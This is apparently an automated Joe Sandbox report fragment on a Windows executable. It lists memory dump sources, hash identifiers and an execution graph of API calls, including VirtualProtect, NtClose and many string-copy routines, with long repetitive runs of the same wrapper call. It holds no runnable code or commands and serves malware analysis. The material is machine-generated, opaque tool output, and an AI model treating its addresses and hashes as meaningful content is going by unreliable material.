                                                                  control_flow_graph 621 7ff612d31800-7ff612d31810 622 7ff612d31824 621->622 623 7ff612d31812-7ff612d31822 621->623 624 7ff612d3182b-7ff612d31867 call 7ff612d32290 fprintf 622->624 623->624
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
                                                                  • Instruction ID: ebefd67a362303ccb6f88c52513b16fe929899d6a58aa5ceadb24d402208c2f5
                                                                  • Opcode Fuzzy Hash: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
                                                                  • Instruction Fuzzy Hash: 97F0C251E18E8982E211DB24E9410B96360FB59BE9F409331DE4ED3251DFACF182C310

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
                                                                  • Instruction ID: 0ac1aa46b6351dc2ef1b15abaad1b9608fab041887ee4b1843c9fd4eff32ef34
                                                                  • Opcode Fuzzy Hash: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
                                                                  • Instruction Fuzzy Hash: FC01EC66E0DD0A85FA15CB11EE082751260BF04FF8F598231CE1DC3B94DFACAD95C220

                                                                  Execution Graph

                                                                  Execution Coverage:4.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:1470
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 3849 7ff621a9216f 3850 7ff621a92185 3849->3850 3851 7ff621a92178 InitializeCriticalSection 3849->3851 3851->3850 3852 7ff621a91a70 3853 7ff621a9199e 3852->3853 3856 7ff621a91a7d 3852->3856 3854 7ff621a91a0f 3853->3854 3855 7ff621a919e9 VirtualProtect 3853->3855 3855->3853 3870 7ff621a91fd0 3871 7ff621a91fe4 3870->3871 3872 7ff621a92033 3870->3872 3871->3872 3873 7ff621a91ffd EnterCriticalSection LeaveCriticalSection 3871->3873 3873->3872 3874 7ff621a92050 3875 7ff621a9205e EnterCriticalSection 3874->3875 3876 7ff621a920cf 3874->3876 3877 7ff621a920c2 LeaveCriticalSection 3875->3877 3878 7ff621a92079 3875->3878 3877->3876 3878->3877 3879 7ff621a920bd free 3878->3879 3879->3877 3917 7ff621a91e10 3918 7ff621a91e2f 3917->3918 3919 7ff621a91ecc 3918->3919 3922 7ff621a91eb5 3918->3922 3924 7ff621a91e55 3918->3924 3920 7ff621a91ed3 signal 3919->3920 3919->3922 3921 7ff621a91ee4 3920->3921 3920->3922 3921->3922 3923 7ff621a91eea signal 3921->3923 3923->3922 3924->3922 3925 7ff621a91f12 signal 3924->3925 3925->3922 3901 7ff621a91ab3 3902 7ff621a91ade 3901->3902 3903 7ff621a91b36 3902->3903 3906 7ff621a9199e 3902->3906 3908 7ff621a91a0f 3902->3908 3904 7ff621a91ba0 4 API calls 3903->3904 3905 7ff621a91b53 3904->3905 3907 7ff621a919e9 VirtualProtect 3906->3907 3906->3908 3907->3906 3845 7ff621a91394 3846 7ff621a96e80 malloc 3845->3846 3847 7ff621a913b8 3846->3847 3848 7ff621a913c6 NtClose 3847->3848 3888 7ff621a91f47 3889 7ff621a91e99 3888->3889 3890 7ff621a91e67 signal 3888->3890 3890->3889 3891 7ff621a91e7c 3890->3891 3891->3889 3892 7ff621a91e82 signal 3891->3892 3892->3889 3909 7ff621a9219e 3910 7ff621a92272 3909->3910 3911 7ff621a921ab EnterCriticalSection 3909->3911 3912 7ff621a92265 LeaveCriticalSection 3911->3912 3914 7ff621a921c8 3911->3914 3912->3910 3913 7ff621a921e9 TlsGetValue GetLastError 3913->3914 3914->3912 3914->3913 2490 7ff621a91140 2493 7ff621a91160 2490->2493 2492 7ff621a91156 2494 7ff621a911b9 2493->2494 2495 7ff621a9118b 2493->2495 2496 7ff621a911c7 _amsg_exit 2494->2496 2498 7ff621a911d3 2494->2498 2495->2494 2501 7ff621a91190 2495->2501 2496->2498 2497 7ff621a911a0 Sleep 2497->2494 2497->2501 2499 7ff621a91201 _initterm 2498->2499 2500 7ff621a9121a 2498->2500 2499->2500 2518 7ff621a91880 2500->2518 2501->2494 2501->2497 2503 7ff621a91247 SetUnhandledExceptionFilter 2504 7ff621a9126a 2503->2504 2505 7ff621a9126f malloc 2504->2505 2506 7ff621a9128b 2505->2506 2509 7ff621a912d2 2505->2509 2507 7ff621a912a0 strlen malloc memcpy 2506->2507 2507->2507 2508 7ff621a912d0 2507->2508 2508->2509 2525 7ff621a93b30 2509->2525 2511 7ff621a91315 2512 7ff621a91344 2511->2512 2513 7ff621a91324 2511->2513 2516 7ff621a91160 84 API calls 2512->2516 2514 7ff621a91338 2513->2514 2515 7ff621a9132d _cexit 2513->2515 2514->2492 2515->2514 2517 7ff621a91366 2516->2517 2517->2492 2519 7ff621a918a2 2518->2519 2524 7ff621a91a0f 2518->2524 2520 7ff621a91956 2519->2520 2521 7ff621a9199e 2519->2521 2519->2524 2520->2521 2668 7ff621a91ba0 2520->2668 2523 7ff621a919e9 VirtualProtect 2521->2523 2521->2524 2523->2521 2524->2503 2527 7ff621a93b46 2525->2527 2526 7ff621a93c40 wcslen 2678 7ff621a9153f 2526->2678 2527->2526 2532 7ff621a93d40 2535 7ff621a93d5a memset wcscat memset 2532->2535 2538 7ff621a93db3 2535->2538 2537 7ff621a93e03 wcslen 2539 7ff621a93e15 2537->2539 2544 7ff621a93e5c 2537->2544 2538->2537 2540 7ff621a93e30 _wcsnicmp 2539->2540 2541 7ff621a93e46 wcslen 2540->2541 2540->2544 2541->2540 2541->2544 2542 7ff621a93ebd wcscpy wcscat memset 2543 7ff621a93efc 2542->2543 2545 7ff621a94004 wcscpy wcscat memset 2543->2545 2544->2542 2546 7ff621a9403f 2545->2546 2547 7ff621a94361 wcslen 2546->2547 2548 7ff621a9436f 2547->2548 2556 7ff621a943ac 2547->2556 2549 7ff621a94380 _wcsnicmp 2548->2549 2550 7ff621a94396 wcslen 2549->2550 2549->2556 2550->2549 2550->2556 2551 7ff621a944bb wcscpy wcscat memset 2553 7ff621a944fd 2551->2553 2552 7ff621a94542 wcscpy wcscat memset 2554 7ff621a94588 2552->2554 2553->2552 2555 7ff621a945ed wcscpy wcscat memset 2554->2555 2558 7ff621a94633 2555->2558 2556->2551 2557 7ff621a94663 wcscpy wcscat 2559 7ff621a94b1a memset 2557->2559 2564 7ff621a94694 2557->2564 2558->2557 2561 7ff621a94b3b 2559->2561 2560 7ff621a94b7e wcscpy wcscat 2563 7ff621a95e9b memcpy 2560->2563 2586 7ff621a94a28 2560->2586 2561->2560 2562 7ff621a947d5 wcslen 2838 7ff621a9157b 2562->2838 2563->2586 2564->2562 2567 7ff621a9486b memset 2569 7ff621a9488c 2567->2569 2568 7ff621a92df0 11 API calls 2571 7ff621a94d82 _wcsicmp 2568->2571 2570 7ff621a948dc wcslen 2569->2570 2857 7ff621a915a8 2570->2857 2574 7ff621a94d9d memset 2571->2574 2591 7ff621a9512c 2571->2591 2573 7ff621a9497d 2573->2571 2870 7ff621a92df0 2573->2870 2578 7ff621a94dc1 2574->2578 2577 7ff621a951f9 wcslen 2582 7ff621a9153f 2 API calls 2577->2582 2581 7ff621a94e06 wcscpy wcscat wcslen 2578->2581 2579 7ff621a94971 2583 7ff621a9145e 2 API calls 2579->2583 2580 7ff621a9494c _wcsnicmp 2580->2579 2594 7ff621a95bb4 2580->2594 2882 7ff621a9146d 2581->2882 2585 7ff621a9528b 2582->2585 2583->2573 2589 7ff621a9145e 2 API calls 2585->2589 2586->2568 2593 7ff621a9529d 2589->2593 2590 7ff621a95c11 wcslen 2595 7ff621a915a8 2 API calls 2590->2595 2591->2577 2606 7ff621a9532a 2593->2606 3189 7ff621a92f70 2593->3189 2594->2590 2596 7ff621a95c6d 2595->2596 2599 7ff621a9145e 2 API calls 2596->2599 2597 7ff621a94f11 2982 7ff621a914a9 2597->2982 2598 7ff621a962ea 2601 7ff621a9145e 2 API calls 2598->2601 2599->2573 2605 7ff621a962f6 2601->2605 2602 7ff621a95387 wcslen 2607 7ff621a9539d 2602->2607 2628 7ff621a953dc 2602->2628 2605->2511 2606->2602 2610 7ff621a953b0 _wcsnicmp 2607->2610 2608 7ff621a94fad 2613 7ff621a9145e 2 API calls 2608->2613 2609 7ff621a952c7 3193 7ff621a938c0 2609->3193 2614 7ff621a953c6 wcslen 2610->2614 2610->2628 2617 7ff621a94fa1 2613->2617 2614->2610 2614->2628 3118 7ff621a93350 memset 2617->3118 2618 7ff621a94f95 2621 7ff621a9145e 2 API calls 2618->2621 2619 7ff621a95516 memset wcscpy wcscat 2622 7ff621a92f70 2 API calls 2619->2622 2620 7ff621a914c7 2 API calls 2623 7ff621a9531c 2620->2623 2621->2617 2626 7ff621a9556d 2622->2626 2623->2606 2630 7ff621a9145e 2 API calls 2623->2630 2629 7ff621a93350 11 API calls 2626->2629 2628->2619 2632 7ff621a95585 2629->2632 2630->2606 2633 7ff621a914c7 2 API calls 2632->2633 2634 7ff621a955b3 memset 2633->2634 2640 7ff621a955d4 2634->2640 2635 7ff621a95624 wcslen 2641 7ff621a95636 2635->2641 2642 7ff621a95677 wcscat memset 2635->2642 2636 7ff621a92df0 11 API calls 2643 7ff621a95127 2636->2643 2637 7ff621a95423 2637->2636 2638 7ff621a92df0 11 API calls 2650 7ff621a95091 2638->2650 2639 7ff621a95008 2639->2638 2640->2635 2644 7ff621a95650 _wcsnicmp 2641->2644 2649 7ff621a956b2 2642->2649 2643->2511 2644->2642 2646 7ff621a95662 wcslen 2644->2646 2646->2642 2646->2644 2647 7ff621a92df0 11 API calls 2647->2643 2648 7ff621a95722 wcscpy wcscat 2652 7ff621a95754 2648->2652 2649->2648 2650->2647 2651 7ff621a96170 memcpy 2654 7ff621a95891 2651->2654 2652->2651 2652->2654 2653 7ff621a95a57 wcslen 2655 7ff621a9153f 2 API calls 2653->2655 2654->2653 2656 7ff621a95ae2 2655->2656 2657 7ff621a9145e 2 API calls 2656->2657 2658 7ff621a95af3 2657->2658 2659 7ff621a95b8b 2658->2659 2661 7ff621a92f70 2 API calls 2658->2661 2660 7ff621a9145e 2 API calls 2659->2660 2660->2643 2662 7ff621a95b20 2661->2662 2663 7ff621a938c0 11 API calls 2662->2663 2664 7ff621a95b45 2663->2664 2665 7ff621a914c7 2 API calls 2664->2665 2666 7ff621a95b7d 2665->2666 2666->2659 2667 7ff621a9145e 2 API calls 2666->2667 2667->2659 2671 7ff621a91bc2 2668->2671 2669 7ff621a91c04 memcpy 2669->2520 2671->2669 2672 7ff621a91c45 VirtualQuery 2671->2672 2673 7ff621a91cf4 2671->2673 2672->2673 2677 7ff621a91c72 2672->2677 2674 7ff621a91d23 GetLastError 2673->2674 2676 7ff621a91d37 2674->2676 2675 7ff621a91ca4 VirtualProtect 2675->2669 2675->2674 2677->2669 2677->2675 3216 7ff621a91394 2678->3216 2680 7ff621a9154e 2681 7ff621a91394 2 API calls 2680->2681 2682 7ff621a9155d 2681->2682 2683 7ff621a91394 2 API calls 2682->2683 2684 7ff621a9156c 2683->2684 2685 7ff621a91394 2 API calls 2684->2685 2686 7ff621a9157b 2685->2686 2687 7ff621a91394 2 API calls 2686->2687 2688 7ff621a9158a 2687->2688 2689 7ff621a91394 2 API calls 2688->2689 2690 7ff621a91599 2689->2690 2691 7ff621a91394 2 API calls 2690->2691 2692 7ff621a915a8 2691->2692 2693 7ff621a91394 2 API calls 2692->2693 2694 7ff621a915b7 2693->2694 2695 7ff621a915c6 2694->2695 2696 7ff621a91394 2 API calls 2694->2696 2697 7ff621a91394 2 API calls 2695->2697 2696->2695 2698 7ff621a915d0 2697->2698 2699 7ff621a915d5 2698->2699 2700 7ff621a91394 2 API calls 2698->2700 2701 7ff621a91394 2 API calls 2699->2701 2700->2699 2702 7ff621a915e4 2701->2702 2703 7ff621a91394 2 API calls 2702->2703 2704 7ff621a915f3 2703->2704 2704->2643 2705 7ff621a91503 2704->2705 2706 7ff621a91394 2 API calls 2705->2706 2707 7ff621a9150d 2706->2707 2708 7ff621a91512 2707->2708 2709 7ff621a91394 2 API calls 2707->2709 2710 7ff621a91394 2 API calls 2708->2710 2709->2708 2711 7ff621a91521 2710->2711 2712 7ff621a91394 2 API calls 2711->2712 2713 7ff621a9152b 2712->2713 2714 7ff621a91530 2713->2714 2715 7ff621a91394 2 API calls 2713->2715 2716 7ff621a91394 2 API calls 2714->2716 2715->2714 2717 7ff621a9153a 2716->2717 2718 7ff621a91394 2 API calls 2717->2718 2719 7ff621a9153f 2718->2719 2720 7ff621a91394 2 API calls 2719->2720 2721 7ff621a9154e 2720->2721 2722 7ff621a91394 2 API calls 2721->2722 2723 7ff621a9155d 2722->2723 2724 7ff621a91394 2 API calls 2723->2724 2725 7ff621a9156c 2724->2725 2726 7ff621a91394 2 API calls 2725->2726 2727 7ff621a9157b 2726->2727 2728 7ff621a91394 2 API calls 2727->2728 2729 7ff621a9158a 2728->2729 2730 7ff621a91394 2 API calls 2729->2730 2731 7ff621a91599 2730->2731 2732 7ff621a91394 2 API calls 2731->2732 2733 7ff621a915a8 2732->2733 2734 7ff621a91394 2 API calls 2733->2734 2735 7ff621a915b7 2734->2735 2736 7ff621a915c6 2735->2736 2737 7ff621a91394 2 API calls 2735->2737 2738 7ff621a91394 2 API calls 2736->2738 2737->2736 2739 7ff621a915d0 2738->2739 2740 7ff621a915d5 2739->2740 2741 7ff621a91394 2 API calls 2739->2741 2742 7ff621a91394 2 API calls 2740->2742 2741->2740 2743 7ff621a915e4 2742->2743 2744 7ff621a91394 2 API calls 2743->2744 2745 7ff621a915f3 2744->2745 2745->2532 2746 7ff621a9156c 2745->2746 2747 7ff621a91394 2 API calls 2746->2747 2748 7ff621a9157b 2747->2748 2749 7ff621a91394 2 API calls 2748->2749 2750 7ff621a9158a 2749->2750 2751 7ff621a91394 2 API calls 2750->2751 2752 7ff621a91599 2751->2752 2753 7ff621a91394 2 API calls 2752->2753 2754 7ff621a915a8 2753->2754 2755 7ff621a91394 2 API calls 2754->2755 2756 7ff621a915b7 2755->2756 2757 7ff621a915c6 2756->2757 2758 7ff621a91394 2 API calls 2756->2758 2759 7ff621a91394 2 API calls 2757->2759 2758->2757 2760 7ff621a915d0 2759->2760 2761 7ff621a915d5 2760->2761 2762 7ff621a91394 2 API calls 2760->2762 2763 7ff621a91394 2 API calls 2761->2763 2762->2761 2764 7ff621a915e4 2763->2764 2765 7ff621a91394 2 API calls 2764->2765 2766 7ff621a915f3 2765->2766 2766->2532 2767 7ff621a9145e 2766->2767 2768 7ff621a91394 2 API calls 2767->2768 2769 7ff621a9146d 2768->2769 2770 7ff621a91394 2 API calls 2769->2770 2771 7ff621a9147c 2770->2771 2772 7ff621a91394 2 API calls 2771->2772 2773 7ff621a9148b 2772->2773 2774 7ff621a91394 2 API calls 2773->2774 2775 7ff621a9149a 2774->2775 2776 7ff621a91394 2 API calls 2775->2776 2777 7ff621a914a9 2776->2777 2778 7ff621a914b8 2777->2778 2779 7ff621a91394 2 API calls 2777->2779 2780 7ff621a91394 2 API calls 2778->2780 2779->2778 2781 7ff621a914c2 2780->2781 2782 7ff621a914c7 2781->2782 2783 7ff621a91394 2 API calls 2781->2783 2784 7ff621a91394 2 API calls 2782->2784 2783->2782 2785 7ff621a914d6 2784->2785 2786 7ff621a91394 2 API calls 2785->2786 2787 7ff621a914e0 2786->2787 2788 7ff621a914e5 2787->2788 2789 7ff621a91394 2 API calls 2787->2789 2790 7ff621a91394 2 API calls 2788->2790 2789->2788 2791 7ff621a914ef 2790->2791 2792 7ff621a914f4 2791->2792 2793 7ff621a91394 2 API calls 2791->2793 2794 7ff621a91394 2 API calls 2792->2794 2793->2792 2795 7ff621a914fe 2794->2795 2796 7ff621a91503 2795->2796 2797 7ff621a91394 2 API calls 2795->2797 2798 7ff621a91394 2 API calls 2796->2798 2797->2796 2799 7ff621a9150d 2798->2799 2800 7ff621a91512 2799->2800 2801 7ff621a91394 2 API calls 2799->2801 2802 7ff621a91394 2 API calls 2800->2802 2801->2800 2803 7ff621a91521 2802->2803 2804 7ff621a91394 2 API calls 2803->2804 2805 7ff621a9152b 2804->2805 2806 7ff621a91530 2805->2806 2807 7ff621a91394 2 API calls 2805->2807 2808 7ff621a91394 2 API calls 2806->2808 2807->2806 2809 7ff621a9153a 2808->2809 2810 7ff621a91394 2 API calls 2809->2810 2811 7ff621a9153f 2810->2811 2812 7ff621a91394 2 API calls 2811->2812 2813 7ff621a9154e 2812->2813 2814 7ff621a91394 2 API calls 2813->2814 2815 7ff621a9155d 2814->2815 2816 7ff621a91394 2 API calls 2815->2816 2817 7ff621a9156c 2816->2817 2818 7ff621a91394 2 API calls 2817->2818 2819 7ff621a9157b 2818->2819 2820 7ff621a91394 2 API calls 2819->2820 2821 7ff621a9158a 2820->2821 2822 7ff621a91394 2 API calls 2821->2822 2823 7ff621a91599 2822->2823 2824 7ff621a91394 2 API calls 2823->2824 2825 7ff621a915a8 2824->2825 2826 7ff621a91394 2 API calls 2825->2826 2827 7ff621a915b7 2826->2827 2828 7ff621a915c6 2827->2828 2829 7ff621a91394 2 API calls 2827->2829 2830 7ff621a91394 2 API calls 2828->2830 2829->2828 2831 7ff621a915d0 2830->2831 2832 7ff621a915d5 2831->2832 2833 7ff621a91394 2 API calls 2831->2833 2834 7ff621a91394 2 API calls 2832->2834 2833->2832 2835 7ff621a915e4 2834->2835 2836 7ff621a91394 2 API calls 2835->2836 2837 7ff621a915f3 2836->2837 2837->2532 2839 7ff621a91394 2 API calls 2838->2839 2840 7ff621a9158a 2839->2840 2841 7ff621a91394 2 API calls 2840->2841 2842 7ff621a91599 2841->2842 2843 7ff621a91394 2 API calls 2842->2843 2844 7ff621a915a8 2843->2844 2845 7ff621a91394 2 API calls 2844->2845 2846 7ff621a915b7 2845->2846 2847 7ff621a915c6 2846->2847 2848 7ff621a91394 2 API calls 2846->2848 2849 7ff621a91394 2 API calls 2847->2849 2848->2847 2850 7ff621a915d0 2849->2850 2851 7ff621a915d5 2850->2851 2852 7ff621a91394 2 API calls 2850->2852 2853 7ff621a91394 2 API calls 2851->2853 2852->2851 2854 7ff621a915e4 2853->2854 2855 7ff621a91394 2 API calls 2854->2855 2856 7ff621a915f3 2855->2856 2856->2567 2856->2573 2858 7ff621a91394 2 API calls 2857->2858 2859 7ff621a915b7 2858->2859 2860 7ff621a915c6 2859->2860 2861 7ff621a91394 2 API calls 2859->2861 2862 7ff621a91394 2 API calls 2860->2862 2861->2860 2863 7ff621a915d0 2862->2863 2864 7ff621a915d5 2863->2864 2865 7ff621a91394 2 API calls 2863->2865 2866 7ff621a91394 2 API calls 2864->2866 2865->2864 2867 7ff621a915e4 2866->2867 2868 7ff621a91394 2 API calls 2867->2868 2869 7ff621a915f3 2868->2869 2869->2579 2869->2580 3226 7ff621a92660 2870->3226 2872 7ff621a92e00 memset 2881 7ff621a92e3c 2872->2881 2875 7ff621a9145e 2 API calls 2876 7ff621a92f35 2875->2876 2877 7ff621a92f53 2876->2877 3261 7ff621a91512 2876->3261 2879 7ff621a9145e 2 API calls 2877->2879 2880 7ff621a92f5d 2879->2880 2880->2586 3228 7ff621a92690 2881->3228 2883 7ff621a91394 2 API calls 2882->2883 2884 7ff621a9147c 2883->2884 2885 7ff621a91394 2 API calls 2884->2885 2886 7ff621a9148b 2885->2886 2887 7ff621a91394 2 API calls 2886->2887 2888 7ff621a9149a 2887->2888 2889 7ff621a91394 2 API calls 2888->2889 2890 7ff621a914a9 2889->2890 2891 7ff621a914b8 2890->2891 2892 7ff621a91394 2 API calls 2890->2892 2893 7ff621a91394 2 API calls 2891->2893 2892->2891 2894 7ff621a914c2 2893->2894 2895 7ff621a914c7 2894->2895 2896 7ff621a91394 2 API calls 2894->2896 2897 7ff621a91394 2 API calls 2895->2897 2896->2895 2898 7ff621a914d6 2897->2898 2899 7ff621a91394 2 API calls 2898->2899 2900 7ff621a914e0 2899->2900 2901 7ff621a914e5 2900->2901 2902 7ff621a91394 2 API calls 2900->2902 2903 7ff621a91394 2 API calls 2901->2903 2902->2901 2904 7ff621a914ef 2903->2904 2905 7ff621a914f4 2904->2905 2906 7ff621a91394 2 API calls 2904->2906 2907 7ff621a91394 2 API calls 2905->2907 2906->2905 2908 7ff621a914fe 2907->2908 2909 7ff621a91503 2908->2909 2910 7ff621a91394 2 API calls 2908->2910 2911 7ff621a91394 2 API calls 2909->2911 2910->2909 2912 7ff621a9150d 2911->2912 2913 7ff621a91512 2912->2913 2914 7ff621a91394 2 API calls 2912->2914 2915 7ff621a91394 2 API calls 2913->2915 2914->2913 2916 7ff621a91521 2915->2916 2917 7ff621a91394 2 API calls 2916->2917 2918 7ff621a9152b 2917->2918 2919 7ff621a91530 2918->2919 2920 7ff621a91394 2 API calls 2918->2920 2921 7ff621a91394 2 API calls 2919->2921 2920->2919 2922 7ff621a9153a 2921->2922 2923 7ff621a91394 2 API calls 2922->2923 2924 7ff621a9153f 2923->2924 2925 7ff621a91394 2 API calls 2924->2925 2926 7ff621a9154e 2925->2926 2927 7ff621a91394 2 API calls 2926->2927 2928 7ff621a9155d 2927->2928 2929 7ff621a91394 2 API calls 2928->2929 2930 7ff621a9156c 2929->2930 2931 7ff621a91394 2 API calls 2930->2931 2932 7ff621a9157b 2931->2932 2933 7ff621a91394 2 API calls 2932->2933 2934 7ff621a9158a 2933->2934 2935 7ff621a91394 2 API calls 2934->2935 2936 7ff621a91599 2935->2936 2937 7ff621a91394 2 API calls 2936->2937 2938 7ff621a915a8 2937->2938 2939 7ff621a91394 2 API calls 2938->2939 2940 7ff621a915b7 2939->2940 2941 7ff621a915c6 2940->2941 2942 7ff621a91394 2 API calls 2940->2942 2943 7ff621a91394 2 API calls 2941->2943 2942->2941 2944 7ff621a915d0 2943->2944 2945 7ff621a915d5 2944->2945 2946 7ff621a91394 2 API calls 2944->2946 2947 7ff621a91394 2 API calls 2945->2947 2946->2945 2948 7ff621a915e4 2947->2948 2949 7ff621a91394 2 API calls 2948->2949 2950 7ff621a915f3 2949->2950 2951 7ff621a91530 2950->2951 2952 7ff621a91394 2 API calls 2951->2952 2953 7ff621a9153a 2952->2953 2954 7ff621a91394 2 API calls 2953->2954 2955 7ff621a9153f 2954->2955 2956 7ff621a91394 2 API calls 2955->2956 2957 7ff621a9154e 2956->2957 2958 7ff621a91394 2 API calls 2957->2958 2959 7ff621a9155d 2958->2959 2960 7ff621a91394 2 API calls 2959->2960 2961 7ff621a9156c 2960->2961 2962 7ff621a91394 2 API calls 2961->2962 2963 7ff621a9157b 2962->2963 2964 7ff621a91394 2 API calls 2963->2964 2965 7ff621a9158a 2964->2965 2966 7ff621a91394 2 API calls 2965->2966 2967 7ff621a91599 2966->2967 2968 7ff621a91394 2 API calls 2967->2968 2969 7ff621a915a8 2968->2969 2970 7ff621a91394 2 API calls 2969->2970 2971 7ff621a915b7 2970->2971 2972 7ff621a915c6 2971->2972 2973 7ff621a91394 2 API calls 2971->2973 2974 7ff621a91394 2 API calls 2972->2974 2973->2972 2975 7ff621a915d0 2974->2975 2976 7ff621a915d5 2975->2976 2977 7ff621a91394 2 API calls 2975->2977 2978 7ff621a91394 2 API calls 2976->2978 2977->2976 2979 7ff621a915e4 2978->2979 2980 7ff621a91394 2 API calls 2979->2980 2981 7ff621a915f3 2980->2981 2981->2597 2981->2598 2983 7ff621a914b8 2982->2983 2984 7ff621a91394 2 API calls 2982->2984 2985 7ff621a91394 2 API calls 2983->2985 2984->2983 2986 7ff621a914c2 2985->2986 2987 7ff621a914c7 2986->2987 2988 7ff621a91394 2 API calls 2986->2988 2989 7ff621a91394 2 API calls 2987->2989 2988->2987 2990 7ff621a914d6 2989->2990 2991 7ff621a91394 2 API calls 2990->2991 2992 7ff621a914e0 2991->2992 2993 7ff621a914e5 2992->2993 2994 7ff621a91394 2 API calls 2992->2994 2995 7ff621a91394 2 API calls 2993->2995 2994->2993 2996 7ff621a914ef 2995->2996 2997 7ff621a914f4 2996->2997 2998 7ff621a91394 2 API calls 2996->2998 2999 7ff621a91394 2 API calls 2997->2999 2998->2997 3000 7ff621a914fe 2999->3000 3001 7ff621a91503 3000->3001 3002 7ff621a91394 2 API calls 3000->3002 3003 7ff621a91394 2 API calls 3001->3003 3002->3001 3004 7ff621a9150d 3003->3004 3005 7ff621a91512 3004->3005 3006 7ff621a91394 2 API calls 3004->3006 3007 7ff621a91394 2 API calls 3005->3007 3006->3005 3008 7ff621a91521 3007->3008 3009 7ff621a91394 2 API calls 3008->3009 3010 7ff621a9152b 3009->3010 3011 7ff621a91530 3010->3011 3012 7ff621a91394 2 API calls 3010->3012 3013 7ff621a91394 2 API calls 3011->3013 3012->3011 3014 7ff621a9153a 3013->3014 3015 7ff621a91394 2 API calls 3014->3015 3016 7ff621a9153f 3015->3016 3017 7ff621a91394 2 API calls 3016->3017 3018 7ff621a9154e 3017->3018 3019 7ff621a91394 2 API calls 3018->3019 3020 7ff621a9155d 3019->3020 3021 7ff621a91394 2 API calls 3020->3021 3022 7ff621a9156c 3021->3022 3023 7ff621a91394 2 API calls 3022->3023 3024 7ff621a9157b 3023->3024 3025 7ff621a91394 2 API calls 3024->3025 3026 7ff621a9158a 3025->3026 3027 7ff621a91394 2 API calls 3026->3027 3028 7ff621a91599 3027->3028 3029 7ff621a91394 2 API calls 3028->3029 3030 7ff621a915a8 3029->3030 3031 7ff621a91394 2 API calls 3030->3031 3032 7ff621a915b7 3031->3032 3033 7ff621a915c6 3032->3033 3034 7ff621a91394 2 API calls 3032->3034 3035 7ff621a91394 2 API calls 3033->3035 3034->3033 3036 7ff621a915d0 3035->3036 3037 7ff621a915d5 3036->3037 3038 7ff621a91394 2 API calls 3036->3038 3039 7ff621a91394 2 API calls 3037->3039 3038->3037 3040 7ff621a915e4 3039->3040 3041 7ff621a91394 2 API calls 3040->3041 3042 7ff621a915f3 3041->3042 3042->2608 3043 7ff621a91440 3042->3043 3044 7ff621a91394 2 API calls 3043->3044 3045 7ff621a9144f 3044->3045 3046 7ff621a91394 2 API calls 3045->3046 3047 7ff621a9145e 3046->3047 3048 7ff621a91394 2 API calls 3047->3048 3049 7ff621a9146d 3048->3049 3050 7ff621a91394 2 API calls 3049->3050 3051 7ff621a9147c 3050->3051 3052 7ff621a91394 2 API calls 3051->3052 3053 7ff621a9148b 3052->3053 3054 7ff621a91394 2 API calls 3053->3054 3055 7ff621a9149a 3054->3055 3056 7ff621a91394 2 API calls 3055->3056 3057 7ff621a914a9 3056->3057 3058 7ff621a914b8 3057->3058 3059 7ff621a91394 2 API calls 3057->3059 3060 7ff621a91394 2 API calls 3058->3060 3059->3058 3061 7ff621a914c2 3060->3061 3062 7ff621a914c7 3061->3062 3063 7ff621a91394 2 API calls 3061->3063 3064 7ff621a91394 2 API calls 3062->3064 3063->3062 3065 7ff621a914d6 3064->3065 3066 7ff621a91394 2 API calls 3065->3066 3067 7ff621a914e0 3066->3067 3068 7ff621a914e5 3067->3068 3069 7ff621a91394 2 API calls 3067->3069 3070 7ff621a91394 2 API calls 3068->3070 3069->3068 3071 7ff621a914ef 3070->3071 3072 7ff621a914f4 3071->3072 3073 7ff621a91394 